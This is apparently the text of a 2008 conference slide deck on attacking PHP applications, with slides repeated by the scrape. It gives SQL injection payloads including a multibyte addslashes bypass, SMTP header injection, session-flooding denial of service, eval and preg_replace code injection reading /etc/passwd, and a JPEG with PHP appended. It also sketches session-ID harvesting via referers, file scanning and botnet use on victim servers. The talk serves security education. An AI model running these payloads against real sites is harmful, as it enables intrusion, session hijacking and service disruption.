Exploiting PHP with PHP Arpad Ray @ PHPNW08

Why use PHP for this? We already know how to write PHP

We already know how to write PHP

Why use PHP for this? We already know how to write PHP Can use directly in test scripts

We already know how to write PHP

Can use directly in test scripts

Why use PHP for this? We already know how to write PHP Can use directly in test scripts PHP provides everything we need

We already know how to write PHP

Can use directly in test scripts

PHP provides everything we need

Why use PHP for this? We already know how to write PHP Can use directly in test scripts PHP provides everything we need Writing PHP can be very quick

We already know how to write PHP

Can use directly in test scripts

PHP provides everything we need

Writing PHP can be very quick

Why use PHP for this? We already know how to write PHP Can use directly in test scripts PHP provides everything we need Writing PHP can be very quick Can efficiently re-use and combine attacks

We already know how to write PHP

Can use directly in test scripts

PHP provides everything we need

Writing PHP can be very quick

Can efficiently re-use and combine attacks

SQL injection Probably the first attack most PHP developers hear of

Probably the first attack most PHP developers hear of

SQL injection $q = "SELECT * FROM foobar WHERE id = $_GET[id]";

$q = "SELECT * FROM foobar WHERE id = $_GET[id]";

SQL injection $q = "SELECT * FROM foobar WHERE id = $_GET[id]"; index.php?id=1 OR 1=1 $_GET['id'] = '1 OR 1=1';

$q = "SELECT * FROM foobar WHERE id = $_GET[id]";

index.php?id=1 OR 1=1 $_GET['id'] = '1 OR 1=1';

SQL injection $q = "SELECT * FROM foobar WHERE id = $_GET[id]"; index.php?id=1 OR 1=1 $_GET['id'] = '1 OR 1=1'; $q = "SELECT * FROM foobar WHERE id = 1 OR 1=1 ";

$q = "SELECT * FROM foobar WHERE id = $_GET[id]";

index.php?id=1 OR 1=1 $_GET['id'] = '1 OR 1=1';

$q = "SELECT * FROM foobar WHERE id = 1 OR 1=1 ";

SQL injection $q = "SELECT * FROM foobar WHERE id = ' $_GET[id] ' ";

$q = "SELECT * FROM foobar WHERE id = ' $_GET[id] ' ";

SQL injection $q = "SELECT * FROM foobar WHERE id = ' $_GET[id] ' "; index.php?id=' OR ''=' $_GET['id'] = “' OR ''='”;

$q = "SELECT * FROM foobar WHERE id = ' $_GET[id] ' ";

index.php?id=' OR ''=' $_GET['id'] = “' OR ''='”;

SQL injection $q = "SELECT * FROM foobar WHERE id = ' $_GET[id] ' "; index.php?id=' OR ''=' $_GET['id'] = “' OR ''='”; $q = "SELECT * FROM foobar WHERE id = ' ' OR ''=' ' ";

$q = "SELECT * FROM foobar WHERE id = ' $_GET[id] ' ";

index.php?id=' OR ''=' $_GET['id'] = “' OR ''='”;

$q = "SELECT * FROM foobar WHERE id = ' ' OR ''=' ' ";

SQL injection $q = "SELECT * FROM foobar WHERE id = ' $_POST[id] ' ";

$q = "SELECT * FROM foobar WHERE id = ' $_POST[id] ' ";

SQL injection $q = &quot;SELECT * FROM foobar WHERE id = $_POST[id]&quot;; <form method=”post” action=” http://example.com/foo.php ”> <input type=”hidden” name=”id” value=”1 OR 1=1” /> <input type=”submit” /> </form>

$q = &quot;SELECT * FROM foobar WHERE id = $_POST[id]&quot;;

<form method=”post” action=” http://example.com/foo.php ”>

<input type=”hidden” name=”id” value=”1 OR 1=1” /> <input type=”submit” /> </form>

SQL injection $q = &quot;SELECT * FROM foobar WHERE id = $_POST[id]&quot;; $context = stream_context_create(array('http' => array( 'method' => 'post' 'content' => 'id=1 OR 1=1' ))); file_get_contents(' http://example.com/foo.php ', false, $context);

$q = &quot;SELECT * FROM foobar WHERE id = $_POST[id]&quot;;

$context = stream_context_create(array('http' => array( 'method' => 'post' 'content' => 'id=1 OR 1=1' ))); file_get_contents(' http://example.com/foo.php ', false, $context);

SQL injection $q = 'SELECT * FROM foobar WHERE id = ' . addslashes($id);

$q = 'SELECT * FROM foobar WHERE id = ' . addslashes($id);

addslashes()‏ $id = addslashes($_POST['id']); $q = &quot;SELECT * FROM foobar WHERE id = ' $id ' &quot;; $_POST['id'] = “' OR ''='”; $q = &quot;SELECT * FROM foobar WHERE id = '' OR ''='' &quot;;

$id = addslashes($_POST['id']); $q = &quot;SELECT * FROM foobar WHERE id = ' $id ' &quot;;

$_POST['id'] = “' OR ''='”;

$q = &quot;SELECT * FROM foobar WHERE id = '' OR ''='' &quot;;

addslashes()‏ Getting around that pesky backslash

Getting around that pesky backslash

addslashes()‏ Getting around that pesky backslash Multi-byte character attacks

Getting around that pesky backslash

Multi-byte character attacks

addslashes()‏ Getting around that pesky backslash Multi-byte character attacks Swallow the backslash with a multi-byte character ending with that byte

Getting around that pesky backslash

Multi-byte character attacks

Swallow the backslash with a multi-byte character ending with that byte

addslashes()‏ Getting around that pesky backslash Multi-byte character attacks Swallow the backslash with a multi-byte character ending with that byte <start of mb character><single quote> // apply addslashes() <mb character><single quote>

Getting around that pesky backslash

Multi-byte character attacks

Swallow the backslash with a multi-byte character ending with that byte

<start of mb character><single quote> // apply addslashes() <mb character><single quote>

addslashes()‏ $mbCharacter = &quot;xBFx5C&quot;; $quote = substr($mbCharacter, 0, -1) . ''';

$mbCharacter = &quot;xBFx5C&quot;; $quote = substr($mbCharacter, 0, -1) . ''';

addslashes()‏ $mbCharacter = &quot;xBFx5C&quot;; $quote = substr($mbCharacter, 0, -1) . '''; $id = &quot; $quote OR $quote$quote = $quote &quot;; $context = stream_context_create(array('http' => array( 'method' => 'post' 'content' => http_build_query(array('id' => $id)) ))); file_get_contents('http://example.com/foo.php', false, $context); $q = &quot;SELECT * FROM foobar WHERE id = ' ?' OR '?'='? ' &quot;;

$mbCharacter = &quot;xBFx5C&quot;; $quote = substr($mbCharacter, 0, -1) . '''; $id = &quot; $quote OR $quote$quote = $quote &quot;; $context = stream_context_create(array('http' => array( 'method' => 'post' 'content' => http_build_query(array('id' => $id)) ))); file_get_contents('http://example.com/foo.php', false, $context);

$q = &quot;SELECT * FROM foobar WHERE id = ' ?' OR '?'='? ' &quot;;

addslashes()‏ $mbCharacter = &quot;xBFx5C&quot;; $quote = substr($mbCharacter, 0, -1) . '''; $id = &quot; $quote OR 1=1 /* &quot;; $context = stream_context_create(array('http' => array( 'method' => 'post' 'content' => http_build_query(array('id' => $id)) ))); file_get_contents('http://example.com/foo.php', false, $context); $q = &quot;SELECT * FROM foobar WHERE id = ' ?' OR 1=1 /* ' &quot;;

$mbCharacter = &quot;xBFx5C&quot;; $quote = substr($mbCharacter, 0, -1) . '''; $id = &quot; $quote OR 1=1 /* &quot;; $context = stream_context_create(array('http' => array( 'method' => 'post' 'content' => http_build_query(array('id' => $id)) ))); file_get_contents('http://example.com/foo.php', false, $context);

$q = &quot;SELECT * FROM foobar WHERE id = ' ?' OR 1=1 /* ' &quot;;

magic_quotes_gpc Uses addslashes() so escaping is not secure

Uses addslashes() so escaping is not secure

magic_quotes_gpc Uses addslashes() so escaping is not secure Fosters complacency

Uses addslashes() so escaping is not secure

Fosters complacency

magic_quotes_gpc Uses addslashes() so escaping is not secure Fosters complacency Applications using magic quotes are much harder to make truly portable

Uses addslashes() so escaping is not secure

Fosters complacency

Applications using magic quotes are much harder to make truly portable

magic_quotes_gpc Uses addslashes() so escaping is not secure Fosters complacency Applications using magic quotes are much harder to make truly portable Inconsistencies between PHP versions

Uses addslashes() so escaping is not secure

Fosters complacency

Applications using magic quotes are much harder to make truly portable

Inconsistencies between PHP versions

magic_quotes_gpc $context = stream_context_create(array('http' => array( 'user_agent' => $foo ))); $context = stream_context_create(array('http' => array( 'method' => 'get' 'header' => 'X-Foo: ' . $foo )));

$context = stream_context_create(array('http' => array( 'user_agent' => $foo )));

$context = stream_context_create(array('http' => array( 'method' => 'get' 'header' => 'X-Foo: ' . $foo )));

magic_quotes_gpc ? scalar'1=foo& array'1[scalar'2]=foo& array'1[array'2][scalar'3]=foo

? scalar'1=foo& array'1[scalar'2]=foo& array'1[array'2][scalar'3]=foo

magic_quotes_gpc Expected result: Array ( [scalar'1] => foo [array'1] => Array ( [scalar'2] => foo [array'2] => Array ( [scalar'3] => foo ) ) )‏

Expected result:

Array ( [scalar'1] => foo [array'1] => Array ( [scalar'2] => foo [array'2] => Array ( [scalar'3] => foo ) ) )‏

magic_quotes_gpc PHP 4.3.3 Array ( [ scalar'1 ] => foo [ array'1 ] => Array ( [ scalar'2 ] => foo [array'2] => Array ( [ scalar'3 ] => foo ) ) )‏

PHP 4.3.3

Array ( [ scalar'1 ] => foo [ array'1 ] => Array ( [ scalar'2 ] => foo [array'2] => Array ( [ scalar'3 ] => foo ) ) )‏

magic_quotes_gpc PHP 4.4.0 Array ( [ scalar'1 ] => foo [ array'1 ] => Array ( [ scalar'2 ] => foo [array'2] => Array ( [ scalar'3 ] => foo ) ) )‏

PHP 4.4.0

Array ( [ scalar'1 ] => foo [ array'1 ] => Array ( [ scalar'2 ] => foo [array'2] => Array ( [ scalar'3 ] => foo ) ) )‏

magic_quotes_gpc PHP 5.0.0 (OFF)‏ Array ( [scalar'1] => foo [array'1] => Array ( [scalar'2] => foo [array'2] => Array ( [scalar'3] => foo ) ) )‏

PHP 5.0.0 (OFF)‏

Array ( [scalar'1] => foo [array'1] => Array ( [scalar'2] => foo [array'2] => Array ( [scalar'3] => foo ) ) )‏

magic_quotes_gpc PHP 5.2.2 Array ( [scalar'1] => foo [array'1] => Array ( [scalar'2] => foo [array'2] => Array ( [scalar'3] => foo ) ) )‏

PHP 5.2.2

Array ( [scalar'1] => foo [array'1] => Array ( [scalar'2] => foo [array'2] => Array ( [scalar'3] => foo ) ) )‏

magic_quotes_gpc There are also problems disabling magic_quotes_gpc

There are also problems disabling magic_quotes_gpc

magic_quotes_gpc There are also problems disabling magic_quotes_gpc function stripslashes_deep($value) { $value = is_array($value) ? array_map('stripslashes_deep', $value) : stripslashes($value); return $value; }

There are also problems disabling magic_quotes_gpc

function stripslashes_deep($value) { $value = is_array($value) ? array_map('stripslashes_deep', $value) : stripslashes($value); return $value; }

magic_quotes_gpc There are also problems disabling magic_quotes_gpc Instead of passing id=1 we can pass: 'id' . str_repeat('[]', 1000) . '=1' We can trivially force the web server to do a lot of unnecessary work

There are also problems disabling magic_quotes_gpc

Instead of passing id=1 we can pass: 'id' . str_repeat('[]', 1000) . '=1'

We can trivially force the web server to do a lot of unnecessary work

Denial of Service Failure to release resources

Failure to release resources

Denial of Service Failure to release resources Writing user data to disk

Failure to release resources

Writing user data to disk

Denial of Service function fill_sessions($url, $num = 1000) { $context = stream_context_create(array( 'http' => array( 'method' => 'HEAD' ) )); for ($i = $num; $i--;) { file_get_contents($url, false, $context); } }

function fill_sessions($url, $num = 1000) { $context = stream_context_create(array( 'http' => array( 'method' => 'HEAD' ) )); for ($i = $num; $i--;) { file_get_contents($url, false, $context); } }

Denial of Service Failure to release resources Writing user data to disk Locking customer accounts

Failure to release resources

Writing user data to disk

Locking customer accounts

SMTP injection

SMTP injection $to = 'foobar@example.com'; $subject = $_POST['subject']; $from = $_POST['from']; mail($to, $subject, 'From: ' . $from);

$to = 'foobar@example.com';

$subject = $_POST['subject'];

$from = $_POST['from'];

mail($to, $subject, 'From: ' . $from);

SMTP injection $context = stream_context_create(array('http' => array( 'method' => 'post' 'content' => http_build_query(array( 'subject' => &quot;foo
Cc: target@example.com&quot;, 'from' => &quot;from@example.com
Cc: target@example.com&quot; ))‏ )));

$context = stream_context_create(array('http' => array(

'method' => 'post'

'content' => http_build_query(array(

'subject' => &quot;foo
Cc: target@example.com&quot;,

'from' => &quot;from@example.com
Cc: target@example.com&quot;

))‏

)));

SMTP injection Variable mail address

Variable mail address

SMTP injection Variable mail address Sanitisation

Variable mail address

Sanitisation

SMTP injection Variable mail address Sanitisation Validation

Variable mail address

Sanitisation

Validation

SMTP injection Variable mail address Sanitisation Validation /^[^@]+@(?:w+.)+w{2,6}$/

Variable mail address

Sanitisation

Validation

/^[^@]+@(?:w+.)+w{2,6}$/

Hot vulnerabilities Direct eval() injection

Direct eval() injection

Hot vulnerabilities Direct eval() injection class Foo { function Foo() { $a = func_get_args(); print_r($a); } } eval('$foo = new Foo(' . implode(',', $args) . ');');

Direct eval() injection

class Foo { function Foo() { $a = func_get_args(); print_r($a); } }

eval('$foo = new Foo(' . implode(',', $args) . ');');

Hot vulnerabilities Direct eval() injection $args[0] = 'readfile(“/etc/passed”)';

Direct eval() injection

$args[0] = 'readfile(“/etc/passed”)';

Hot vulnerabilities preg_replace() using /e modifier $s = '$-42 dollars'; preg_replace('/$(.*?) dollars/e', 'abs($1)', $s)‏ $s = '42';

preg_replace() using /e modifier

$s = '$-42 dollars';

preg_replace('/$(.*?) dollars/e', 'abs($1)', $s)‏

$s = '42';

Hot vulnerabilities preg_replace() using /e modifier $s = '$1).foobar().abs(1 dollars'; preg_replace('/$(.*?) dollars/e', 'abs($1)', $s)‏ $s = '4242';

preg_replace() using /e modifier

$s = '$1).foobar().abs(1 dollars';

preg_replace('/$(.*?) dollars/e', 'abs($1)', $s)‏

$s = '4242';

Hot vulnerabilities preg_replace() using /e modifier $s = '$1).readfile(chr(47).chr(101)...abs(1 dollars'; preg_replace('/$(.*?) dollars/e', 'abs($1)', $s)‏ $s = '4242';

preg_replace() using /e modifier

$s = '$1).readfile(chr(47).chr(101)...abs(1 dollars';

preg_replace('/$(.*?) dollars/e', 'abs($1)', $s)‏

$s = '4242';

Hot vulnerabilities Variable in include() call $page = $_GET['page']; include $page;

Variable in include() call

$page = $_GET['page']; include $page;

Hot vulnerabilities Direct eval() injection preg_replace() using /e modifier Variable in include() call Uploading PHP files

Direct eval() injection

preg_replace() using /e modifier

Variable in include() call

Uploading PHP files

Hot vulnerabilities Uploading PHP files Check file extension Check uploaded MIME type Check file MIME type Move outside of web root

Uploading PHP files

Check file extension

Check uploaded MIME type

Check file MIME type

Move outside of web root

Hot vulnerabilities $script = <<<EOT <?php var_dump('hello world!'); EOT; $jpeg = '/path/to/some_valid.jpg'; $fp = fopen($jpeg, 'ab'); fwrite($fp, $script); fclose($fp);

$script = <<<EOT <?php var_dump('hello world!'); EOT; $jpeg = '/path/to/some_valid.jpg'; $fp = fopen($jpeg, 'ab'); fwrite($fp, $script); fclose($fp);

Hot vulnerabilities Direct eval() injection preg_replace() using /e modifier Variable in include() call Uploading PHP files

Direct eval() injection

preg_replace() using /e modifier

Variable in include() call

Uploading PHP files

Hot vulnerabilities Direct eval() injection preg_replace() using /e modifier Variable in include() call Uploading PHP files Shell injection

Direct eval() injection

preg_replace() using /e modifier

Variable in include() call

Uploading PHP files

Shell injection

Making an evil website HTTP requests can give us lots of interesting information PHPSESSID = bingo

HTTP requests can give us lots of interesting information

PHPSESSID = bingo

Making an evil website if (isset($_SESSION['HTTP_REFERER'])) { if (preg_match(' / PHPSESSID=([^=&]+) /xi', $_SESSION['HTTP_REFERER'])); }

if (isset($_SESSION['HTTP_REFERER'])) { if (preg_match(' / PHPSESSID=([^=&]+) /xi', $_SESSION['HTTP_REFERER'])); }

Making an evil website if (isset($_SESSION['HTTP_REFERER'])) { if (preg_match(' / PHPSESSID=([^=&]+) | (?<==)([a-fd]{32}|[a-fd]{40}) /xi', $_SESSION['HTTP_REFERER'])); }

if (isset($_SESSION['HTTP_REFERER'])) { if (preg_match(' / PHPSESSID=([^=&]+) |

(?<==)([a-fd]{32}|[a-fd]{40}) /xi', $_SESSION['HTTP_REFERER'])); }

Making use of victims File scan

File scan

Making use of victims File scan $dir = new RecursiveIteratorIterator( new RecursiveDirectoryIterator('/', true)‏ ); foreach ($dir as $file) { echo $file->getPathname(), &quot;
&quot;; }

File scan

$dir = new RecursiveIteratorIterator(

new RecursiveDirectoryIterator('/', true)‏

);

foreach ($dir as $file) {

echo $file->getPathname(), &quot;
&quot;;

}

Making use of victims File scan Subverting existing files

File scan

Subverting existing files

Making use of victims File scan Subverting existing files Escalate privileges, take over machine

File scan

Subverting existing files

Escalate privileges, take over machine

Making use of victims File scan Subverting existing files Escalate privileges, take over machine botnet.php

File scan

Subverting existing files

Escalate privileges, take over machine

botnet.php

Questions?